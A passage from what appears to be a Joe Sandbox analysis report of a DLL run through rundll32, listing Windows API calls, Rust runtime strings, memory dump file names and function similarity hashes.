                        • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CBAFAA7
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove
                        • String ID:
                        • API String ID: 2162964266-0
                        • Opcode ID: 3b51dd3324827822860904831cee7934f1c23aefd1a5b3cf3bc0d5f50ac01984
                        • Instruction ID: be0855ecb891c7e3766cce0b78d99ea1245520a93f3972d430ddbfefa0292af1
                        • Opcode Fuzzy Hash: 3b51dd3324827822860904831cee7934f1c23aefd1a5b3cf3bc0d5f50ac01984
                        • Instruction Fuzzy Hash: 9CA14E756087819FCB11CF64C4907DAB7E1EF8A304F08856AECC95F746DB70994ACB62
                        APIs
                        • memmove.VCRUNTIME140(?,?,000000AC), ref: 6CBD8176
                        • memmove.VCRUNTIME140(?,?,000000AC), ref: 6CBD81BC
                        • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CBD81EC
                          • Part of subcall function 6CBC3A0F: memmove.VCRUNTIME140(00000000,?,000000B8,?,?,6CBAFA35), ref: 6CBC3A29
                        • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CBD822A
                        • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CBD8273
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove
                        • String ID:
                        • API String ID: 2162964266-0
                        • Opcode ID: aebcf0d0bcd271e771aa587bce04cf73270ca4cae9b78049f01da5e3378d3468
                        • Instruction ID: 6b871429e2af15d40f53b4e2068df694cc02aef5c74da1ed0a4ca15c2d4965dc
                        • Opcode Fuzzy Hash: aebcf0d0bcd271e771aa587bce04cf73270ca4cae9b78049f01da5e3378d3468
                        • Instruction Fuzzy Hash: 66A16F755087809FCB11CF24C4807DAB7E1AF8A314F09896EEC8D5F746DB71A949CBA2
                        APIs
                        • memmove.VCRUNTIME140(?,?,0000009C), ref: 6CB99998
                        • memmove.VCRUNTIME140(?,?,0000009C), ref: 6CB999BF
                        • memmove.VCRUNTIME140(?,?,0000009C), ref: 6CB999EE
                        • memmove.VCRUNTIME140(?,?,0000009C), ref: 6CB99A1A
                        • memmove.VCRUNTIME140(?,?,00000090), ref: 6CB99AA0
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove
                        • String ID:
                        • API String ID: 2162964266-0
                        • Opcode ID: 6e7c3f0f7be93f81bdd00f71ce2aeed2a58b85ca8c9e32199ea54de918823ef3
                        • Instruction ID: 6ec69070ac8a78cde7c1a7f4b45f78fbefbdca9ed3db47c6bc575fc6fcd534d0
                        • Opcode Fuzzy Hash: 6e7c3f0f7be93f81bdd00f71ce2aeed2a58b85ca8c9e32199ea54de918823ef3
                        • Instruction Fuzzy Hash: DE81AB729083459FC755CF64C480B9AF7E5FF89318F048969E48D9B750EB70E949CB82
                        APIs
                        • memmove.VCRUNTIME140(?,?,?), ref: 6CC0340E
                        • memmove.VCRUNTIME140(00000000,?,?), ref: 6CC0351D
                          • Part of subcall function 6CB65AF0: RtlReAllocateHeap.NTDLL(00000000,?,6CBE8F66,?,?,?,?,?,6CBE8F66,?,?,?,?,?), ref: 6CB65B0E
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove$AllocateHeap
                        • String ID: called `Result::unwrap()` on an `Err` value$capacity overflow
                        • API String ID: 1771830547-2618782069
                        • Opcode ID: 94ee2905b4503b0d3d0650d17173255eec1f032179fe5e3fd48c36f276250554
                        • Instruction ID: 244c9fcef51868c9e0b82e8521f0385567ee6ed182f9d6390bcd4cb484c62f0e
                        • Opcode Fuzzy Hash: 94ee2905b4503b0d3d0650d17173255eec1f032179fe5e3fd48c36f276250554
                        • Instruction Fuzzy Hash: 53E15A707093419FD728CF19C490A6EB7E1BFC9318F14892EE5999BB50E732E845CB92
                        APIs
                        • memmove.VCRUNTIME140(?,00000098,00000098), ref: 6CBB81A2
                        • memmove.VCRUNTIME140(00000000,?,00000738), ref: 6CBB81F1
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove
                        • String ID: scheme is valid$slash is a valid path
                        • API String ID: 2162964266-3029000764
                        • Opcode ID: ca37f710b60f56bd04bcd1dd8027385ddf13a4d64cff377cae7b74d450af06e3
                        • Instruction ID: b246f6b3df40b7f4b2739af5cfe66d2a55c5584de27a4eb6b29cb4a4bd7467c5
                        • Opcode Fuzzy Hash: ca37f710b60f56bd04bcd1dd8027385ddf13a4d64cff377cae7b74d450af06e3
                        • Instruction Fuzzy Hash: 73B1C431A04B828BD721CF24C4507AEB7E1BFC5358F14891DE8886F781EB75994ACB82
                        APIs
                        • memmove.VCRUNTIME140(?,?,?), ref: 6CB90491
                        • memmove.VCRUNTIME140(00000000,?,?), ref: 6CB90570
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove
                        • String ID: capacity overflow
                        • API String ID: 2162964266-2273299319
                        • Opcode ID: 8060867509e049a2242fdbd9bc061e9e76eac15a2b4f71cf9fffd581d2ab7c67
                        • Instruction ID: 31775a59f47206434b31cdf9c5cf354692daf20fba8ff66986bb7267299bbd8c
                        • Opcode Fuzzy Hash: 8060867509e049a2242fdbd9bc061e9e76eac15a2b4f71cf9fffd581d2ab7c67
                        • Instruction Fuzzy Hash: C471E570A046829BC304DF19E49066EF3A5FF8A714F10863DD8594BB50E735EC55CB81
                        APIs
                          • Part of subcall function 6CB8BF6A: memmove.VCRUNTIME140(?,?,00000029), ref: 6CB8C011
                          • Part of subcall function 6CB8C01E: memmove.VCRUNTIME140(?,?,00000029), ref: 6CB8C112
                        • memmove.VCRUNTIME140(?,?,00000029), ref: 6CBAD2D9
                        • memmove.VCRUNTIME140(?,?,00000029), ref: 6CBAD33F
                        Strings
                        • scheme and authority is valid Uri, xrefs: 6CBAD39E
                        • called `Result::unwrap()` on an `Err` value, xrefs: 6CBAD380
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove
                        • String ID: called `Result::unwrap()` on an `Err` value$scheme and authority is valid Uri
                        • API String ID: 2162964266-1220905182
                        • Opcode ID: ca09e4ba2601c6b6af4b74a3fccff427919dceb038b19437beca994059298b81
                        • Instruction ID: 30003f2680901bcaf0e7a51c0fd5d23f9b49c78149e07595d5b2677ae3eed5f4
                        • Opcode Fuzzy Hash: ca09e4ba2601c6b6af4b74a3fccff427919dceb038b19437beca994059298b81
                        • Instruction Fuzzy Hash: AF818B35509B819BC321CF25D4506AFFBF4EFDA744F04890EE8D91BA41DB30A55ACB92
                        APIs
                        • memmove.VCRUNTIME140(?,?,?), ref: 6CB914A3
                        • memmove.VCRUNTIME140(00000000,?,?), ref: 6CB915A4
                        Strings
                        • capacity overflow, xrefs: 6CB915CA
                        • called `Result::unwrap()` on an `Err` value, xrefs: 6CB915FF
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove
                        • String ID: called `Result::unwrap()` on an `Err` value$capacity overflow
                        • API String ID: 2162964266-2618782069
                        • Opcode ID: 729e90a8e808c2215d966be7e1bac770a5c3b06362e5cf341df803abe96b61ee
                        • Instruction ID: 9336d5e6a11743cc5f81c3c44c38d3853c36aa919cd2497d9189db76375d4618
                        • Opcode Fuzzy Hash: 729e90a8e808c2215d966be7e1bac770a5c3b06362e5cf341df803abe96b61ee
                        • Instruction Fuzzy Hash: D651B3706046429BC714CF19C48069AF7E9EF8A718F18893DE89A5BB50E731EC55DB82
                        APIs
                        • memmove.VCRUNTIME140(?,?,?), ref: 6CB90655
                        • memmove.VCRUNTIME140(00000000,?,?), ref: 6CB9074B
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove
                        • String ID: called `Result::unwrap()` on an `Err` value$capacity overflow
                        • API String ID: 2162964266-2618782069
                        • Opcode ID: 23b2fac355096829ba53da3a4d335a342e353a34fcf17af9be76c1e3c4a43f55
                        • Instruction ID: ef5e4b3ab23de8555ef5ae78853e4cf6aa40d5b7deac664910bcace835546315
                        • Opcode Fuzzy Hash: 23b2fac355096829ba53da3a4d335a342e353a34fcf17af9be76c1e3c4a43f55
                        • Instruction Fuzzy Hash: A551B1706087859FC704DF19D590A5AB7E5FFCA308F10893DD8594BB51EB31E899CB82
                        APIs
                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CBF9A2C
                        • CloseHandle.KERNEL32(?), ref: 6CBF9A3A
                        • GetLastError.KERNEL32 ref: 6CBF9AA5
                        • CloseHandle.KERNEL32(?), ref: 6CBF9B06
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: CloseHandle$ErrorLastObjectSingleWait
                        • String ID:
                        • API String ID: 1454876536-0
                        • Opcode ID: bd5014e58d4edfcde8a453b749ffe87ef837e4bee0b219172c9f63f183352505
                        • Instruction ID: e87c08b751a9cc1f7c3c0fdd2aadf8efc5f3222ce370de30a2a667ce1d5a2538
                        • Opcode Fuzzy Hash: bd5014e58d4edfcde8a453b749ffe87ef837e4bee0b219172c9f63f183352505
                        • Instruction Fuzzy Hash: 8C31F2B1A007448FCB05DF64D844B9ABBB4FF48328F14856DD41AABB51E736D44ACFA1
                        APIs
                        • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CBCF463
                        • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CBCF4C2
                        • memmove.VCRUNTIME140(?,?,000000B8), ref: 6CBCF4F6
                        Strings
                        • assertion failed: slot.next.is_none(), xrefs: 6CBCF513
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove
                        • String ID: assertion failed: slot.next.is_none()
                        • API String ID: 2162964266-2530839625
                        • Opcode ID: 0267341bd05189c089add218f4205043d6f37d5a06c3d1245a0675efdbe35b1f
                        • Instruction ID: 382cea3c23e4fb2e86815971911b20f3a1395157db3687698526f505c379ecf7
                        • Opcode Fuzzy Hash: 0267341bd05189c089add218f4205043d6f37d5a06c3d1245a0675efdbe35b1f
                        • Instruction Fuzzy Hash: 5E318CB06043419FE711DF14D891B5ABBA4FF80348F1089ADE8984FB91E772E894CB53
                        APIs
                        • __RTC_Initialize.LIBCMT ref: 6CC0104B
                          • Part of subcall function 6CC013C6: InitializeSListHead.KERNEL32(6CC62168,6CC01055,6CC609F0,00000010,6CC00FE6,?,?,?,6CC0120C,?,00000001,?,?,00000001,?,6CC60A38), ref: 6CC013CB
                        • _initterm_e.API-MS-WIN-CRT-RUNTIME-L1-1-0(6CC0621C,6CC06220,6CC609F0,00000010,6CC00FE6,?,?,?,6CC0120C,?,00000001,?,?,00000001,?,6CC60A38), ref: 6CC01064
                        • _initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0(6CC06214,6CC06218,6CC609F0,00000010,6CC00FE6,?,?,?,6CC0120C,?,00000001,?,?,00000001,?,6CC60A38), ref: 6CC01082
                        • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6CC010B5
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image_initterm_initterm_e
                        • String ID:
                        • API String ID: 590286634-0
                        • Opcode ID: 9a65f5a096819eabac376327274e80d5416b55e4b06f43a0f64094b180fbfd08
                        • Instruction ID: 0e84765b2f733c14a67d6b51a33dbb7b9553a6a0e2e7d3035304d8b1a29a1f58
                        • Opcode Fuzzy Hash: 9a65f5a096819eabac376327274e80d5416b55e4b06f43a0f64094b180fbfd08
                        • Instruction Fuzzy Hash: 5D21DE313897499ADB106BFE98147ECB3B1AB1222DF144519D581ABFC0FB23C14AA666
                        APIs
                        • WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(?), ref: 6CBEEFFE
                        • WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(6CC62124), ref: 6CBEF203
                        Strings
                        • use of std::thread::current() is not possible after the thread's local data has been destroyedstd\src\thread\mod.rs, xrefs: 6CBEF2EC
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: AddressSingleWake
                        • String ID: use of std::thread::current() is not possible after the thread's local data has been destroyedstd\src\thread\mod.rs
                        • API String ID: 3114109732-459553403
                        • Opcode ID: 453ea8ba36804a26f7df9fa50ce409813447f3662725ad1a0cd399c6092976f9
                        • Instruction ID: 90144ad6a0117e6a70a98296118011cc71c376219e9d1b562a556b500845111a
                        • Opcode Fuzzy Hash: 453ea8ba36804a26f7df9fa50ce409813447f3662725ad1a0cd399c6092976f9
                        • Instruction Fuzzy Hash: C4D1F3B4A00288CFDB00CFA5D494BEEBBB1FF4A748F144169D516ABB81D7369846CB91
                        APIs
                        • WaitOnAddress.API-MS-WIN-CORE-SYNCH-L1-2-0(00000000,000000FF,00000001,000000FF), ref: 6CBEA645
                        • GetLastError.KERNEL32 ref: 6CBEA64C
                        Strings
                        • use of std::thread::current() is not possible after the thread's local data has been destroyedstd\src\thread\mod.rs, xrefs: 6CBEA65A
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: AddressErrorLastWait
                        • String ID: use of std::thread::current() is not possible after the thread's local data has been destroyedstd\src\thread\mod.rs
                        • API String ID: 1574541344-459553403
                        • Opcode ID: 194d2d52261b777849016b1c2a24990beb79a73c4b2d32e59994559f1e7af092
                        • Instruction ID: 5d12c7696f62d49ed7f0d1fcc0f538eee8cf59889872da9904be49784ca8b9e0
                        • Opcode Fuzzy Hash: 194d2d52261b777849016b1c2a24990beb79a73c4b2d32e59994559f1e7af092
                        • Instruction Fuzzy Hash: E3411574A041C4CFDB11CF58C494BAEBBF4EB0BB58F1041AAD815ABB81D736A806CF91
                        APIs
                        • SwitchToThread.KERNEL32(?,?,6CB8BE07), ref: 6CB894D2
                        Strings
                        • assertion failed: (*next).value.is_some(), xrefs: 6CB8950D
                        • assertion failed: (*tail).value.is_none(), xrefs: 6CB894FB
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: SwitchThread
                        • String ID: assertion failed: (*next).value.is_some()$assertion failed: (*tail).value.is_none()
                        • API String ID: 115865932-1927134345
                        • Opcode ID: 049d60252c242e1f94b6f2179556d37b78fddeb9c05dda74ea5349eb28886388
                        • Instruction ID: e3113f3141d9b493185e2da03f7b57c1633c06014991840a5534d8a03e7967c8
                        • Opcode Fuzzy Hash: 049d60252c242e1f94b6f2179556d37b78fddeb9c05dda74ea5349eb28886388
                        • Instruction Fuzzy Hash: 9301F730B172608FDB208F08E548E45B7E0FF41B69F5AC459D4089FB50D370DC418B91
                        APIs
                        • PostQueuedCompletionStatus.KERNEL32(?,00000001,00000000,00000000), ref: 6CBF7B49
                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,6CBF8D8B), ref: 6CBF7B58
                        Strings
                        • failed to wake I/O driver, xrefs: 6CBF7B68
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: CompletionErrorLastPostQueuedStatus
                        • String ID: failed to wake I/O driver
                        • API String ID: 1506555858-3515527018
                        • Opcode ID: d18c3a97bb46b246041594759c41c001dd3b2e1def3b73a417958312aeec7fcd
                        • Instruction ID: 1c933e6abaf8fa29dbabca3fc4c43b5668bd4659c150dad6853fe7b047025243
                        • Opcode Fuzzy Hash: d18c3a97bb46b246041594759c41c001dd3b2e1def3b73a417958312aeec7fcd
                        • Instruction Fuzzy Hash: C0E0CD717407047FF6202B106D15BA735645F41716F11841CF894FE9C1F79358768195
                        APIs
                        • memmove.VCRUNTIME140(?,?,0000007A), ref: 6CB7C209
                        • memmove.VCRUNTIME140(?,?,0000007A), ref: 6CB7C247
                        • memmove.VCRUNTIME140(?,?,00000088), ref: 6CB7C2BF
                        • memmove.VCRUNTIME140(?,?,0000007E), ref: 6CB7C470
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove
                        • String ID:
                        • API String ID: 2162964266-0
                        • Opcode ID: 6a786cd41c77e8b388edbaaab8f9852e4a8a612924e0a9f45c9e77c62b272006
                        • Instruction ID: c1c015f7a20f0e6fff9851a6191604aaac324214098ce9cdc07c2f686893608f
                        • Opcode Fuzzy Hash: 6a786cd41c77e8b388edbaaab8f9852e4a8a612924e0a9f45c9e77c62b272006
                        • Instruction Fuzzy Hash: B9916A3560D3C19FC322CF24C45079EBBE1AF96308F04495DD8E85BA82D775AA59CBA3
                        APIs
                        • memmove.VCRUNTIME140(?,?,0000007E), ref: 6CBA7FB8
                        • memmove.VCRUNTIME140(?,?,0000007E), ref: 6CBA8062
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove
                        • String ID:
                        • API String ID: 2162964266-0
                        • Opcode ID: 2d2f7392efc5b9275b59d051b21547cf2ce0048b759807a6a74b0612d9487ecc
                        • Instruction ID: 66d4b02eaa61432ebd3473add068761fa61643ae55c3735218eb791ca82923bd
                        • Opcode Fuzzy Hash: 2d2f7392efc5b9275b59d051b21547cf2ce0048b759807a6a74b0612d9487ecc
                        • Instruction Fuzzy Hash: 2441932650D3C06FD7128BA598115DFFFF49F9A604F08C99EE8D81B342D2B19909C7A3
                        APIs
                        • memmove.VCRUNTIME140(?,?,00000388), ref: 6CB9E113
                        • memmove.VCRUNTIME140(?,?,00000388), ref: 6CB9E160
                        • memmove.VCRUNTIME140(?,?,00000388), ref: 6CB9E194
                        • memmove.VCRUNTIME140(?,?,00000388), ref: 6CB9E1C4
                        Memory Dump Source
                        • Source File: 00000003.00000002.2008665755.000000006CB61000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CB60000, based on PE: true
                        • Associated: 00000003.00000002.2008648579.000000006CB60000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008755909.000000006CC06000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008833299.000000006CC62000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000003.00000002.2008889211.000000006CC63000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_6cb60000_rundll32.jbxd
                        Similarity
                        • API ID: memmove
                        • String ID:
